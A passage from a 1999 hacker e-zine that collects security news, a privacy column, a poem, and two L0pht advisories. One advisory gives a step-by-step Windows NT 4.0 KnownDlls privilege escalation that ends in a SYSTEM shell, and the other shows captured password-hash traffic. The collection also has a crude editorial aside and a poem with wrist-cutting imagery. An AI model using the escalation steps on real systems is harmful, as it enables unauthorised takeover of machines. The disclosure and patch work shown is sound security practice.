enforcement role around the world. All of this, Withers said, is being done to ensure the Army's critical circuits and information systems don't fall prey to "cyberterrorists," who wish to do damage to the Army's ability to protect America. "The Army is in the lead in this battle thanks to the can-do attitude of the team that assembled here at ASC headquarters several months ago," Withers said. Now that the team has slammed the door on these terrorists and locked up the networks, the need for constant vigilance goes on. That's where the Regional Computer Emergency Response Team and its theater-level counterparts come in. "Without the human element, this mission won't get done. The soldier is at the tip of the spear,"á Withers said. "Our team is a part of the process -- from fort to foxhole." (Editor's note: Ward is with the U.S. Army Signal Command's Public Affairs Office at Fort Huachuca, Ariz.) -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 03.1 The Key To Unlocking Data Access ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To: InfoSec News <isn@repsec.com> Subject: [ISN] The Key to Unlocking Data Access Tuesday, February 16, 1999, 2:00 p.m. ET. The Key To Unlocking Data Access By RUTRELL YASIN Enterprises are finally doing something about their insecure intranets and extranets. Public-key infrastructure (PKI) technology--until now used mostly to secure Internet transactions in banking and other financial applications--is now reaching deep into corporate departments and everyday business applications. Enterprises can no longer operate without a PKI safety net as they extend applications and data to partners and far-flung employees. Companies are looking for their "return on investment with PKI to come from [securing] business-to-business and internal applications such as human resources systems," says John Pescatore, a senior consultant with PKI vendor Entrust Technologies Inc. Leading the way are corporate titans such as Federal Express Corp., NationsBank Corp. and Texas Instruments Inc., all of which are piloting projects that could set the stage for internal PKI deployment for authentication, privacy and data integrity. Federal Express is out in front. Fedex hopes to reap the benefits of PKI this spring as it rolls out a digital signature-enabled human resources system that gives the company's 141,000 employees secure access to their personnel files. Fedex, which is using Entrust encryption-key management, secure e-mail and application development tools, worked closely with Entrust to migrate the mainframe-based HR systems to an intranet. "When we first started with PKI, we found all the PKI vendors were following an Internet model, not an intranet model," says James Candler, Fedex's vice president of personnel systems and support.á Changes were required to plug PKI into an intranet environment in which users might use multiple workstations, he says. With Internet transactions, the model is much simpler: a home user conducting a transaction with a bank can download a digital certificate--electronic signatures that verify a user's identity--to a PC, and the information is specific to that computer. However, in a corporate setting such as Fedex, departmental and field users need access to desktop PCs in conference rooms and at kiosks. Single-system digital certificates are not enough. As a result, Fedex "had to create roaming certificates" that could be downloaded to a PC from an LDAP-based corporate directory, Candler says. Using an Entrust digital certificate password and hardware ID tokens that resemble credit cards, Fedex wants its managers to transmit employee performance appraisals over the intranet, for example, eliminating a lot of paperwork. But at $65 apiece, the company didn't want to give every employee a secure ID token. "We created a level of trust in the HR system," so employees who don't need access to a higher level of information can log on with just a passphrase, Candler says. One benefit is that the implementation of PKI encryption and digital certificates is letting Fedex employees perform tasks on the Web that they couldn't before, Candler notes. For example, employee salary reviews are now sent to a supervisor via an e-mail message that includes a URL address linking directly to the appropriate HR site where the review is written. Then the supervisor can forward the information on to HR. Candler thinks other companies will add Web extensions to their HR systems to give employees self-service access to benefit and retirement plans. "I've talked to other CIOs, and they agree that this is exactly where their companies need to go,"á Candler says. "We're leading the market by about a year," he says. But as organizations deploy PKI, product interoperability and certificate management have become problematic. NationsBank, a unit of $6.5 billion Bank of America, has launched pilot projects to give employees access to personnel records, 401(k) and other benefits, says Sam Phillips, senior vice president of information security at the bank. PKI is generating "a lot of excitement," Phillips says. However, "like most companies, we want to standardize on one e-mail package. We are a very large organization constantly in acquisition" mode, he says. If one division is using Lotus Notes and the other Microsoft Exchange, the question is how to make the packages work together so that an S/MIME security implementation works across both systems, he says. Another obstacle is directory services, specifically ensuring interoperability between LDAP interfaces from Microsoft, Netscape and Novell, he says. To overcome some of these interoperability problems, NationsBank is using VeriSign Inc.'s Onsite integrated platform as a primary Certificate Authority. VeriSign "gives us flexibility," Phillips says. Instead of NationsBank setting up the PKI infrastructure internally, "VeriSign offers a complete set of services. We can leverage what they're doing" to communicate with GTE CyberTrust or Netscape if customers choose certificates from those vendors, he says. Even electronics giant Texas Instruments opted for VeriSign, scrapping plans to launch a homegrown PKI framework. "We actually built our own PKI, which was fairly robust, but we wanted to concentrate on our core competency," says John Fraser, IT security manager at the $8.4 billion manufacturer. "To deploy PKI, you had to pull together the servers, desktops, clients, the whole ball of wax," Fraser says. "We wanted to be in the position as the market changes to move to the next new solution in PKI without changing" the whole infrastructure, Fraser says. Because VeriSign is based on an open platform, off-the-shelf security products can be integrated into the framework, reducing costs. TI will deploy PKI both for intranets and Internet apps, Fraser says. "But our plan is not to use VeriSign digital certificates for customer-to-business transactions--not like the banking model." TI has launched a program to forge tighter links with suppliers and to extend its intranet to accommodate more self-service apps, he says. As the company deployed PKI technology and digital certificates, the biggest hurdles were managing a certificate revocation list and key escrow for employees who forgot passwords, Fraser says. VeriSign is attempting to solve that problem with OnSite Key Manager, which provides encrypted backup and recovery of end-user keys and digital certificates used within a PKI. For the past year, Entrust, VeriSign and other PKI vendors have been offering tools that make it easier to manage multiple certificates from different vendors as well as add, change and revoke certificates. Securing access to enterprise resource planning apps such as SAP is the next step for TI's PKI efforts, Fraser says. TI plans to deploy digital certificates for SAP's Internet Transaction Server, he says. ERP applications weren't offering links to PKI a year ago, Fraser says. Now SAP, PeopleSoft and Oracle realize their proprietary solutions have to be extended to acknowledge technologies such as Kerberos authentication and PKI. Users are asking about PKI extensions to apps from PeopleSoft and SAP, as well as enterprise management platforms such as Computer Associates' Unicenter TNG and Tivoli Systems Inc.'s TME, Pescatore says. Management platforms are the likely places to add hooks for security modules. "The same platform that is used for managing resources also can be used to manage people using digital certificates. This way, VPNs, switches and routers all can be tied in with PKI," he says. The government of Ontario, Canada, has several pilot projects with Entrust that should bear fruit this year, says Scott Campbell, assistant deputy minister there. The government is issuing digital certificates to social workers at the 50 Children's Aide Societies across the province to ensure privacy. The certificates will let case workers securely access a central database to keep track of child abuse cases. The database is updated regularly, so workers can keep better tabs on abused children if they move from Toronto, for example, to Ottawa, Campbell says. Prior to the pilot, it could take months for workers to track down the whereabouts of a child. Ontario also uses PKI to secure e-mail for the 6,000-person Ontario Provincial Police force. A third pilot will help the 300-person IT group determine if there are any holes in the technology, he says. As users deploy PKI pilots, they may find the real challenge is defining policies that link the technology with business processes, says Spiros Angelopoulos, a group manager with Raytheon at the NASA Ames Research Center. "The tools are there, but [companies must define] policies on how to implement the tools," he says.á For example, with digital certificates, companies need to establish a policy for user eligibility and how users will receive their credentials, he says. NASA Ames, which has 11 research centers across the nation, is using PKI for secure e-mail. The center is moving toward the day when "every person [at the center] will have a digital certificate,"á Angelopoulos says. As PKI products continue to mature and pilots move into production this year, IT managers anticipate a surge in PKI deployments. Says TI's Fraser: "There's more than a [growing] interest in PKI; there's a lot of pent-up demand." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 03.2 Online streaking, are you doing it right now?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ X-Authentication-Warning: enigma.repsec.com: majordomo set sender to owner-isn@repsec.com using -f Received: from mail.inficad.com (mail.inficad.com [207.19.74.5]) by enigma.repsec.com (9.0.1a/7.7.4.nospam) with ESMTP id OAA27245 for <isn@repsec.com>; Wed, 17 Feb 1999 14:36:58 -0700 Received: from shadow.dimensional.com (root@shadow.pagan.net [206.124.26.20]) by mail.inficad.com (8.9.2/8.9.0) with ESMTP id OAA08384 for <isn@repsec.com>; Wed, 17 Feb 1999 14:54:04 -0700 (MST) Received: from flatland.dimensional.com (jericho@flatland.dimensional.com [208.206.176.24]) by shadow.dimensional.com (8.9.1/8.9.1) with SMTP id OAA26722 for <isn@repsec.com>; Wed, 17 Feb 1999 14:52:48 -0700 (MST) To: InfoSec News <isn@repsec.com> Subject: [ISN] Are You Naked Online? How to Protect Your E-Privacy X-Copyright: This e-mail copyright 1998 by jericho@dimensional.com where applicable Forwarded From: darek milewski <darekm@cmeasures.com> Are You Naked Online? How to Protect Your E-Privacy http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3102.html Jesse Berst, Editorial Director Wednesday, February 17, 1999 Remember streakers? Those nutty nudes of the seventies who darted across college campuses? I was always too uptight to join their au naturel jaunts.á Now, more than 20 years later, every Netizen risks total exposure. Of email messages. Of medical records. Of places surfed. I still don't want to bare all. While most Internet businesses work hard to protect your privacy, human screw-ups still happen. That's why these recent headlines worry me: Patient Records on Web: Patient records -- containing names, phone and Social Security numbers, and medical treatments -- at the University of Michigan Medical Center inadvertently lingered on public Web sites for two months.á Click for more. Valentine's Day Cards Not Private: A programming glitch at the Hallmark Cards Web site enabled curious folks to read other people's love notes -- and names, home and email addresses and places of employment. (Does Ken Starr know about this site?) Click for more. FreePCs Raise Privacy Concerns: More than 500,000 people submitted personal information in a bid to win one of only 10,000 free PCs, which will record user behavior.á In other words, 490,000 people gave away their privacy to enter a contest.á In this case the stupidity was on the part of the user. Click for more. Prodded by paranoia, I investigated ways to protect me and my data from prying eyes. Good news: There are ways to prevent online exposure. Abstinence: The safest way to avoid unplanned privacy invasions is to control yourself. Don't send super-personal information via email. (That's what FedEx is for.)á Don't offer unnecessary info. Bigbookstore.com doesn't need your height and weight.á Restrict access to your files. Insist on it with your doctor, banker and broker. Privacy Policies: Scroll down to the bottom of any reputable Web site, including this one, and you'll notice a link to the privacy statement. It will tell you: What info the site gathers about you What it does with the data With whom it shares the data If that policy's cool with you, browse freely. If not, surf elsewhere. An independent consortium called TRUSTe verifies privacy statements and "stamps" its seal of approval on sites that abide by its standards. TRUSTe also oversees a site of its own where you can report privacy offenders. Click for more. Encryption: Think of email notes as postcards -- anyone can read 'em. Many people rely on "security by obscurity"á to protect their email secrets. As in, "there's so much email zipping around no one's going to notice mine." Encryption is a better method. Encryption Primer: Click for more.á Encryption Survival Guide: Encryption expert Robert Gelman discusses how to encrypt your email. Click for more. Online Transactions: ZDTV reveals how encryption protects online shoppers. Click for more. Be Vigilant: Despite my berst, er ... burst, of paranoia, there's no need to worry constantly about electronic privacy.á Let the professionals fret for you. An occasional glance at one of their sites will keep you up-to-date. Electronic Frontier Foundation: Non-profit organization that lobbies for, among other things, online privacy.á Click for more.á Electronic Privacy Information Center: Excellent EPIC features news, tool and resources. Click for more.á FreeCrypto: Encryption site with political bent. Click for more. Unlike streaking, online privacy is not a passing fad. @HWA 04.0 France plays leapfrog with US over crypto laws.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WTF is up with the French gov't?? who do they think they are? first its nukes now they're messing with crypto ... ok I sympathize with this one a bit but anyone who practices nukes in another country or at all for that matter should be shat on then nuked. EoD - Ed Date: Wed, 17 Feb 1999 22:42:26 -0800 From: "Dr. Vann Harl" <vann@schnags.com> Subject: France tell NSA to shove it FRANCE BREAKS RANKS WITH USA & AGAINST USA ON CODES By far the most significant intelligence and security news of the fortnight is French Prime Minister Lionel Jospin's 19 January announcement that France is suddenly reversing its long-term and traditionally restrictive policy toward the public use of encryption systems and allowing complete freedom of use of systems with key lengths up to and including 128 bits.á Currently, only 40 bit keys are legal and they must be deposited with a trusted third party ... of which there is only one recognized in all of France.á Under today's French law, the government has a right to understand any type of communication using public facilities, meaning post, telecommunications, semaphores, or what have you, although this law is seldom invoked publicly. The implication of this French decision goes far beyond France itself and is the first splash of a tidal change that will, in all likelihood, drown the international public encryption policy the US is trying to impose on the world in the name of fighting crime, drugs and terrorism.á France, which has probably suffered more deaths in the past few years from foreign terrorists than any other developed nation, "heard the players, questioned the experts and consulted its international partners" and explicitly decided that American high-tech eavesdropping and economic espionage is more detrimental to French interests than terrorists using encrypted communications.á The American menace is easily discernable in the opening lines of Mr. Jospin's statement concerning this tidal change in encryption policy:á "With the development of electronic espionage instruments, cryptography appears as an essential instrument of privacy protection."á No mention of crime, drugs or terrorists. Since the EU has already imposed much stronger privacy protection laws than the US, has debated the threat posed by the NSA Echelon worldwide telecommunications surveillance system, and has resisted "falling in line behind the FBI" on public eavesdropping, experts expect all EU countries to announce similar public encryption liberalization in the near future.á Indeed, this seems to be the developing EU strategy of letting the "uppity, snobbish Gallic French stand up to the Americans", something the French have always done with pride. Then, "once the rampart is breached", suddenly the other EU countries follow suit in a movement that could only have been negotiated and organized beforehand.á Specialists know it's coming on drug policies, but very few anticipated that a French Socialist government would stand up so unexpectedly to French security and intelligence services (which imposed the 40 bit key limit, a record lower limit in Western countries) and to the US.á Now it's done, the floodgates are open and watch what's going to happen ...á (...cut...) --------------------------------------------- @HWA 05.0 More kewl poetry from Phiregod ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Before u read this excellent piece of prose, clear your mind of any shit that might be left over from your workaday meagre existance and ponder the wisdom in the words, don't go off half-cocked coz it mentions gh0d either the message is deep some of you will not get it, I think that I do, since my IQ is in the 150+ range but some of you dumbasses out there may have trouble with it <sarcasm> anyways read on and enjoy but keep your flames to yourself, thanks phiregod for another really cool piece, keep writing! - Ed `_god42_' how many times do i have to walk down these halls humming 'in the name of love' and searching my soul for the ability to accept myself and others for who and what we are before i know what it is that i'm supposed to be doing with my life? how many times do i have to recite the lord's prayer before i feel the peace i see etched in so many a worshipers' face, when will i know there is a god and that will bring me what i see fulfilled in the heart of everyone i pass on the streets? how many times do i have to cry for the world before a single tear is shed on my behalf, why do i have to be the savior of my own soul when i see so many that are in the hands of their own personal messiah? why do i have to be the one that bleeds? why am i the one that suffers the sins of the children? why do i not see a divine power? slowly but surely i see my ability to speak being taken away, first a number on a pentium processor, then a barcode tattooed on my neck. history is in words, life is in words, love is in words. i hunted my quarry and i held its beating heart in my hands before i drank it's warm blood, i will not let this be taken from me. without freedom my soul is but another caged bird that sings it's sorrow from plastic perch. i will not exsist without my voice, the shred of sanity that comforts me in the complacent warmth of my so called education. i'm in a battle field with no weapon to vanquish the mighty empires except the reason i present without showing my face. like a single scream of a victim in the night i want my words to evoke primal fear in the expression of those that hear it. this is the time that we must use our words not our fists, this is when we win with our knowledge and skill rather then with hatred and money. this is the point in time that we drop our swords and reveal our wrists to be cut for it is the only way that we can show that we are not afraid. this is where the world realizes its sins against its children. i'm failing english even tho i finally understand it's use. i'm slipping out of irc when i finally found what it is i want to say. i'm disappearing from my friend's eyes even tho i understand what it is that they want to see. i'm feeling the grim reaper's breath on my neck even tho its not me that he wants. this rant is over, my voice is weak, and my spirit is worn. i dont want another promise or another wish, i want to wake up and know that i dont have to defend my views, that people understand evil in all of it's forms. i want to yell at the top of my lungs and know that everyone who can hear me will. i dont want to see any more imprisioned for the very things we should praise. dont sell out. amen, phiregod liquidphire@hotmail.com please excuse any grammatical or spelling errors (c) 1999 Phiregod/Liquid Phire and HWA.hax0r.news @HWA 06.0 ISP cracks User's machine then threatens legal action on THEM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://apcmag.com:8008/apcweb/forum.nsf/Headlines/133A922A7876969A4A2566FE00042BC0?OpenDocument Contributed by sAs via HNN contributed by _GryPhoNN_ 17/02/99 Service & Reliability February 99: Hard drive hacked -- by ISP Roulla Yiacoumi (c) 1999 When APC's Service & Reliability column received a phone call from an Internet user claiming his hard drive had been hacked into by his ISP, we had reservations. After all, this was something we had heard many times before, but had never seen proven. What made this time different, however, was that the user claimed he had received a letter from his provider explaining how it had committed the deed. Of course we were interested, but we still had no proof. So we asked the reader to forward the letter to us. To our utter surprise, there were the words, in black and white. In an email addressed to the user, the provider wrote: "For your information, our network administrator, with very little effort, was able to violate your computer's security and examine the contents of your hard drive in only a few minutes." We read it and re-read it. Surely no ISP would actually admit it had hacked a user's hard drive? The name of this ISP? Internet Information Superhighway (IIS). Regular readers will recall that IIS was also the subject of a Service & Reliability column in March 1998 (see here), when a reader claimed he had been disconnected from the service after complaining about a fee increase. So, what horrible offence had this user committed that IIS felt it was within its power to violate the user's hard drive? He had installed an option from the Windows 98 CD called 'HTTP Server' (part of 'Personal Web Server'), believing it was some kind of Web site creation tool. When he discovered it wasn't what he thought it was, he left it sitting on his hard drive until he received the heavy-handed letter from IIS which claimed it had "detected" the program on his machine, demanding it be immediately removed. Further, the provider had the gall to tell the reader that "operating such a service without the appropriate sanctions by the authorities offends State and Federal legislation, not to mention breaching our usage policy under our terms and conditions." Now, we do not dispute that installing this program may have breached the ISP's terms and conditions. Indeed, it is in every user's best interests to read the online agreement before signing up with any provider and to make sure they understand what they can and can't do. However, to claim having this program offends state and federal legislation is ludicrous. There are no laws requiring users to seek approval before running a Web service. Indeed, when we asked IIS to clarify what it meant by these statements, we received a nasty legal letter -- but no answers. The user told us he had contacted the Telecommunications Industry Ombudsman (TIO) and the NSW Commercial Crime Agency. We contacted both of these bodies to see what they had to say about this incident. The TIO said that it had received this complaint and confirmed the matter had been referred to the NSW Police's Commercial Crime Agency. We contacted the NSW Police and spoke to the Computer Crime Investigations Unit. A spokesperson confirmed the matter had been referred to them and had been investigated. Although no further action was taken against this ISP, the police have informed Service & Reliability that they would consider taking action against any ISP that acted with malicious intent, or without authority or lawful excuse in accessing data stored on a computer. And, of course, we attempted to contact the ISP. As we had previously dealt with this ISP, we sent email to the three addresses we had on our books, but all three came back a day later saying they could not be delivered. APC's daily news service Newswire (http://newswire.com.au/) published the story 'ISP busted for hacking' in November 1998 (see here). At the time of posting the story on its site, Newswire wrote that it was unable to contact IIS for comment. When we later decided to run this story as part of Service & Reliability in the magazine, we again attempted to contact the ISP -- this time by fax. We sent a letter and a copy of the Newswire article, inviting the ISP to give its side of the story. We informed the provider that if it wished to respond via Australian Consolidated Press' lawyers, it was welcome to do so. (Australian Personal Computer is published by Australian Consolidated Press.) We requested a written response be forthcoming within one week. Shortly before this deadline expired, our legal team received a written response from the provider's lawyer. It stated that "Newswire was not unable to contact my client as alleged" (false), that the NSW Commercial Crime Agency had not conducted an "investigation" into its client (we only stated that the police had investigated the matter), and that the user was "publishing pornographic material over the Internet using my client's service" -- a claim both the user and police instantly dismissed. Further, the police added that the viewing and downloading of adult material over the Internet was not illegal (with the exception of child pornography, which was not an issue in this case). If the ISP suspected illegal activity on the part of a user, it is obligated to contact the police and not take matters into its own hands. The ISP's lawyer demanded a retraction, claiming Newswire's article was "biased, distorted and malicious". It further accused the author of the article (yours truly) of being "involved in a conspiracy to falsely accuse my client of a crime", adding that this in itself is a crime "punishable by penal servitude for fourteen years". Service & Reliability is a consumer column which seeks to address issues our readers have with hardware and software vendors, ISPs and related businesses. To present both sides of an issue, the vendor is invited and encouraged to respond to the reader's letter -- both the complaint and response are then published. If a vendor does not wish to submit a response, we will publish the complaint without it. We do not succumb to the threat of legal proceedings -- regardless of who the vendor is. Our readers trust APC for its unbiased reporting and thoroughly investigated issues. If you have any comments, drop me a line at ry@acp.com.au. @HWA 07.0 The l0pht releases new NT advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ L0pht Security Advisory Release date: February 18, 1999 Application: Microsoft Windows NT 4.0 Severity: any local user can gain administator privileges and/or take full control over the system Author: dildog@l0pht.com URL: http://www.L0pht.com/advisories.html --- Overview : --- Microsoft Windows NT 4.0 implements a system-wide cache of file-mapping objects for the purpose of loading system dynamic link libraries (DLLs) as quickly as possible. These cache objects, located in the system's internal object namespace, are created with permissions such that the 'Everyone' group has full control over them. Hence, it is possible to delete these cache objects and replace them with others that point to different DLLs. When processes are created, the loader maps/loads the loading executable's imported DLLs into the process space. If there is a DLL cache object available, it is simply mapped into the process space, rather than going to the disk. Hence, there is an exploitable condition, when a low-privilege user replaces a DLL in the cache with a trojan DLL, followed by a high-privelege account launching a process. The high priveleged process will map in the trojan DLL and execute code on behalf of the low privelege use r. --- Affected systems: --- Windows NT 4.0 Server SP4 Windows NT 4.0 Workstation SP4 Other service packs are likely to be vulnerable, but the exploit has not been tested on them, neither has the fix presented below. --- Description : --- The Windows NT object namespace is the place where the kernel keeps the names of mutexes, semaphores, filemapping objects, and other kernel objects. It is organized hierarchically, like a directory structure. Amongst the directories are: \Device \BaseNamedObjects \Driver \KnownDlls ... The NT object namespace is browsable with a tool called 'WinObj 2.0' from System Internals (their website is http://www.sysinternals.com). You may wish to look around this namespace and browse the default permissions of objects. It is quiet entertaining, really. The "\Knowndlls" directory contains a list of DLLs in the c:\winnt\system32 directory, like: \KnownDlls\COMCTL32.dll \KnownDlls\MPR.dll \KnownDlls\advapi32.dll \KnownDlls\kernel32.dll .. All of these objects are created at boot time, and are 'permanent shared objects'. Normally, users can not create permanent shared objects (it's an advanced user right, and it is normally not assigned to any group, even Administrators). But the system pr eloads this cache for you. Permanent shared objects differ from regular shared objects only in the fact that they have a flag set, and an incremented reference count, such that if you create one, and then terminate the creating process or close all handle s to the object, it does not disappear from the object space. To exploit the poor permissions on this cache, one first needs to delete one of the shared objects by name, in order to later replace it. So we make a call to the NTDLL.DLL native function "OpenSection()", getting a handle to the object. Then we call the NTOSKRNL.EXE native function "ZwMakeTemporaryObject()" which removes the 'permanent' flag and decrements the reference counter from the object. Now we just call NTDLL.DLL:NtClose() on the handle and it is destroyed. To create a section, one calls NTDLL.DLL:CreateSection(), which is undocumented. There are other calls one needs to make in order to set up the object and open the KnownDlls directory, but they are trivial and will not be discussed here. Feel free to bro wse the source code presented at the end of this advisory to see what you need to do though. Anyway, you create a section (aka file-mapping) object that points to a trojan DLL. A good candidate for DLL trojan is KERNEL32.DLL, since it is loaded by pretty much every executable you're going to run. Note that any DLL cache objects you create as a user can not be 'permanent', hence, when you log out, the cache object _will_ disappear. So how can we get a higher privelege process to run while we're logged in? There are many ways. We can wait for an 'A t' job to go off, or we can set up the DLL hack as an 'At' job that goes off when someone else is logged in. But more reliable is this: When a new Windows NT subsystem is started, it creates a subsystem process to handle various system details. Examples of these processes are LSASS.EXE and PSXSS.EXE. The PSXSS.EXE is the POSIX subsystem. But since no one ever really uses the POSIX subsys tem under NT. So, chances are, it won't be loaded into memory yet. Once it is, though, it's loaded until the machine reboots. If it loaded, reboot the machine, and it won't be :P. So, we launch our DLL cache hack, and then run a POSIX subsystem command, thus launching PSXSS.EXE (which runs as 'NT AUTHORITY\SYSTEM', the system account), and running our DLL with local administrator privileges. Incidentally, other subsystems have the same effect, such as the OS/2 subsystem (the only other one that probably isn't started yet). --- Workarounds/Fixes: --- I developed a patch for this security problem in the form of a Win32 Service program that can be installed by the Administrator of the system. It sets itself to run every time the system is started, and before the user has the opportunity to start a program, it adjusts the permissions of the DLL cache to something much safer. The source code for t his service is also provided, along with a compiled version. Links to the programs can be found at http://www.l0pht.com/advisories.html. One can verify the validity of the patch by downloading the WinObj v2.0 tool from System Internals (www.sysinternals.com) and inspecting the permissions of the KnownDlls directory, and the section objects within it. Microsoft has been sent a copy of this advisory, and I would expect a hotfix from them at some point in the near future. --- Example : --- I wrote up a trojan to test exploitability, and it was a simple 'forwarder' DLL that had the same exported names as KERNEL32.DLL, but a different 'DllMain()' function, to be called when the DLL is loaded. The function calls in my trojan, simply forward o ff to the real KERNEL32.DLL calls located in a copy of the kernel that you make in 'REALKERN.DLL' in the c:\temp directory. To try out this vulnerability, obtain an account as a low-privilege guest user (referred to as 'Dick') and do the following: 1. Log in as Dick at the console. 2. Start up two "cmd.exe" shells. Do the following in one of them. 3. Copy c:\winnt\system32\kernel32.dll to c:\temp\realkern.dll (The egg dll is hard coded to use the c:\temp directory to find this file. If you can't put it in c:\temp, then modify the source '.def' file to point to a different location and recompile eggdll.dll) 4. Copy the provided hackdll.exe and eggdll.dll to c:\temp 5. Ensure that there is no file named c:\lockout. If there is, delete it. The exploit uses this file as a lockfile. 5. Delete the KERNEL32.DLL file-mapping object from the system cache: c:\> cd\temp c:\temp> hackdll -d kernel32.dll 6. Insert the new file-mapping object with: c:\temp> hackdll -a kernel32.dll c:\temp\eggdll.dll Don't hit a key in this window after hitting enter. 7. Now move to the other cmd.exe window that you started. 8. Run a POSIX subsystem command. A good way to start it is: c:\temp> posix /c calc (if you have calculator installed. If not, pick some other program) 9. Now the EGGDLL.DLL will prompt you with a few message boxes: Say no to the "User is DOMAIN\DICK, Spawn Shell?" box. Say no to the "User is \[garbage], Spawn Shell?" box. Say YES to the "User is NT AUTHORITY\SYSTEM, Spawn Shell?" box. Say YES to the "Winsta0" window station message box. Say YES to the "Desktop" window desktop message box. You will now see a "System Console" command.com shell open up. (saying yes to the next 'winlogon' box will give you something funny when you log out, btw :P) 10. Now go back to your first cmd.exe window and hit a key to unpoison the DLL cache. 11. In the System Console window, run the User Manager program, and modify Dick's account (or anyone else's for that matter) to your hearts content. (NT Server) c:\winnt\system32> usrmgr (NT Workstation) c:\winnt\system32> musrmgr --- Source and Compiled Code: --- Exploit code can be downloaded from L0pht's website at http://www.l0pht.com/advisories.html. It is available in compiled form, and in pure source form as two zipfiles. The L0pht patch for this advisory is also available in both source form and compiled f orm from the same URL. dildog@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- 07.1 The l0pht's Quakenbush clearcase advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ L0pht Security Advisory Advisory released Jan. 21, 1999 Application: Quakenbush Windows NT Password Appraiser Severity: Users of the tool Password Appraiser are unwittingly publishing NT user passwords to the internet (even if your company is behind a firewall). Author: mudge@l0pht.com http://www.l0pht.com/advisories.html --------- Overview : --------- During an internal analysis of a tool which claimed to audit NT passwords we noticed said tool sends users password hashes to a remote system on the internet via HTTP. In addition to this, should the password be known to the remote server, the plaintext equivalent is sent back across the internet to the querying machine. What this means, in a nutshell, is that if you are in any sort of organization connected to the internet - behind a firewall or not* - and you run this program: You send all of your users passwords out through the internet. (* as long as you are permitting {users,employees} to surf the web) This of course, makes the fact that you are trusting a third party with your password information in the first place, a smaller concern by comparison. Quakenbush is aware of this problem - yet there have been no statements that this will ever be fixed or addressed from them. ----------- Disclaimer : ----------- This is a touchy situation as the product in question can be viewed as a competitor to the L0pht's own L0phtCrack 2.51 tool. As such, we are going to do our best not to place any comparison on the two tools functionality, performace specs, etc. in this advisory as this is not a marketing blurb - but instead our regular service to the security community. In all good consciousness we could not keep it a secret that anyone who has run Password Appraiser has unwittingly exposed their private passwords. We hope that various government agencies that are connected to the network and run large NT installations were not bitten by this problem. ------------ Description : ------------ Password Appraiser is a tool that allows administrators to "Find accounts with weak passwords" [1] on NT systems. In actuality what it does is compare only the weaker LANMAN hash against a set of precomputed LANMAN hashes for a table lookup to see if the password is "weak". The Demo version *only* allows one to run the program via quering across the Internet. Other versions allow querying across the internet and/or a local dictionary containing a smaller subset of words/hashes. We were checking the program out locally in our labs and at the same time had taken a copy on an auditing gig of a large corporation ( >300,000 systems with huge NT domains and PDC's). We were interested in how this tool compared to L0phtcrack in real world situations. To see how the tool works we hooked up some network sniffers and ran the demo version on one of our test machines in our local labs. Much to our surprise we watched the LANMAN hashes being sent IN THE CLEAR to pw.quakenbush.com. For the passwords that the server had in its dictionary a plaintext response was sent back. Our jaws dropped on the floor. A quick call to the l0pht member at the large corporation caught him just in time to prevent the running of the program on the corporations main PDC. A few seconds later and all >4000 users hashes (and any plaintext responses) would have been sent out, through the firewall, and across the internet. We know in the above situation that many of the users NT passwords were also the passwords that they chose for various remote access methods. This information could have been used to completely bypass the corporate firewall. So people realize that it is not just the plaintext responses that we are so concerned about - we captured some of the hashes that Password Appraiser could not crack and ran them through publicly available tools in brute force mode to recover the passwords. It is important to mention that user names are not sent across the wire. However, without the usernames the above threat is still quite real. The problem lies the known quantities: the location/site that sent the passwords, and the actual passwords. It is a trivial step to gather the usernames from this point forward. [ Case examples: had the user accounts on our test machine been the actual 7 members of the l0pht it would have been trivial to find our e-mail names and try the passwords. With the large company, many of the passwords were the same and though they would not have been "cracked" by Password Appraiser, they were vulnerable to other tools performing NT password analysis. Determining valid usernames to try with the recovered passwords is easily accomplished through enumeration on sites such as www.four11.com, and whois databases to name a few resources.] -------- Details : -------- Sniffing traffic to port 80 of pw.quakenbush.com shows the following information being exchanged: local client machine == [A] remote dictionary server [pw.quakenbush.com] == [B] [ Example 1 - demonstrating vulnerability on Password Appraiser sending LANMAN hash and plaintext equivalent from "weak" password ] [A] -> [B] GET /default.asp?cid=[*]&v=3086&pw=D85774CF671A9947AAD3B435B51404EE HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* User-Agent: Microsoft URL Control - 6.00.8169 Host: pw.quakenbush.com [*] Note - the cid is the verification mechanism so the server can austensibly check that the client is indeed paid for. The number that was removed was the evaluation number that was automatically sent upon downloading the software. Its value is unimportant for this advisory. [B] -> [A] HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Wed, 20 Jan 1999 23:51:14 GMT Content-Type: text/html Cache-control: private Transfer-Encoding: chunked 12 ::PW::FOOBAR::PW:: 0 From this, one can see that password appraiser only works on the deprecated LANMAN hash which is, in this case : D85774CF671A9947AAD3B435B51404EE The response shows that the password being checked was FOOBAR (case sensitivity is unknown as the program does not look at the NTLM hash). The above can be witnessed during any stage in transit to the quakenbush server. The attacker now has the password. [ Example 2 - demonstrating vulnerability on Password Appraiser sending LANMAN hash of a "strong" password ] [A] -> [B] GET /default.asp?cid=[*]&v=3086&pw=8F4272A6Fc6FDFDFAAD3B435B51404EE HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* User-Agent: Microsoft URL Control - 6.00.8169 Host: pw.quakenbush.com [B] -> [A] HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Thu, 21 Jan 1999 00:09:03 GMT Content-Type: text/html Cache-control: private Transfer-Encoding: chunked 19 ::PW::<not cracked>::PW:: 0 Here, the LANMAN hash is : 8F4272A6FC6FDFDFAAD3B435B51404EE. We see from the response from Password Appraiser that it believes this password to be secure. 